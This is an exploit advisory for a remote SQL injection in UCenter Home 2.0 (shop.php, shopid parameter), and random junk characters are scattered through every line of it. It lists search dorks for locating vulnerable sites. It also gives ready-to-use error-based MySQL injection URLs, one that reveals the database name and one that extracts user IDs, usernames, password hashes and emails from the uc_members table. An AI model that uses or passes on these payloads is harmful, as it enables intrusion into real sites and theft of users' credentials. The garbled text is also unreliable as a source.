2 Z; |7 d5 r. x( D! N
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 9 W" N/ }: y, b$ B, ?' ]
" @1 O. @# n( A$ i1 S1 M. _9 i $ ^* c: N# W/ h% U. K
$ q" e) l8 k# q4 U9 X4 A1 ]6 I
*/ Author : KnocKout & J8 a: o) p( q# z9 F4 v+ b
8 X" J5 a: _- O6 q/ K/ M
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
& n- ?8 r g% r
/ y3 L+ u) ?$ u# B: a; u! y3 P0 u*/ Contact: knockoutr@msn.com
# G2 c) S; P4 j7 |$ w& Z2 ^) g7 ^
. g! j7 C" T- A*/ Cyber-Warrior.org/CWKnocKout
, K1 m" z) Q2 g3 G' q: n. |: C6 {1 @
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & V- r% Y6 ?1 n2 k2 @* n" W
2 z: t, C, \6 f' j( }Script : UCenter Home
/ l" v0 D& ?% e% U( A' ?4 k- t" K3 ]& d+ j a
Version : 2.0 ( H, b" ?0 B8 E( s' ]1 U: l% L
: s& T; v0 X4 d; z. |Script HomePage : http://u.discuz.net/ ! H+ Q6 r' n& e
+ o; [9 f8 M8 Y7 [, j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 O) @( i/ E* V5 S/ D3 `
* [4 W, R6 A7 J- T: w! R/ i
Dork : Powered by UCenter inurl:shop.php?ac=view
6 g: c3 [$ x, P# K5 C9 G. K9 X
, a5 e& ?; T3 w/ d4 j& f/ DDork 2 : inurl:shop.php?ac=view&shopid=
+ ]4 `4 X; e' C7 f) e5 r1 T8 ]3 |, c8 m* `$ ]
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
8 J, ?2 u3 _ E/ o9 P( M* g" h }, P t+ g8 x/ _/ |/ x. k
Vuln file : Shop.php
& F1 O" x4 X$ R$ K) F8 M5 L+ x5 M" g' _' t" m8 H
value's : (?)ac=view&shopid= 7 Q2 o- v' Y2 t* I
2 h4 r+ r& u/ |
Vulnerable Style : SQL Injection (MySQL Error Based)
m8 _7 C. ]! b$ c8 k) f9 j/ ?9 |" S% {4 R
Need Metarials : Hex Conversion - v2 |8 D, [- N6 q
6 a g2 y5 v2 o y {
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( y+ W. a/ c7 b+ w! g
- P) i: J9 W5 s& \* C# F2 ^2 wYour Need victim Database name. 0 y. r3 l+ e1 J- @/ s/ J6 V
' \5 e% \5 E1 u2 [/ @( D/ H
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* W1 ^) H. I# ~$ r9 ], d1 c" e3 g
; F/ {, ~% a( |$ ~4 \5 T C2 v.. : V9 O5 E' J. I: ^7 w
0 X: j# l) v; Y+ x. {; V1 y
DB : Okey. * Y2 m1 D) F, r6 A z+ T
8 J4 i6 Q. k! y/ b: I# G3 J
your edit DB `[TARGET DB NAME]`
& |7 R# P' q% X2 u) ]2 Q/ {5 X( O$ S/ a0 t# @3 ?( j/ B
Example : 'hiwir1_ucenter' % x+ V' C9 c# u& r) E4 Q& a6 I- ?
4 Q5 S: U& ^ |0 ~+ { w) Z( I( D
Edit : Okey. # `* B' \' {, x1 |& Z) d$ l
/ A# Z+ i( s Z5 r, X
Your use Hex conversion. And edit Your SQL Injection Exploit..
3 u1 R& J. Q y) @' @* h6 ~- `6 U# u
1 a7 \6 T3 I$ ]4 ^
& y7 R3 _3 ?6 l9 ~" X* a) ZExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 - u4 m: W0 e3 p, q& ~
|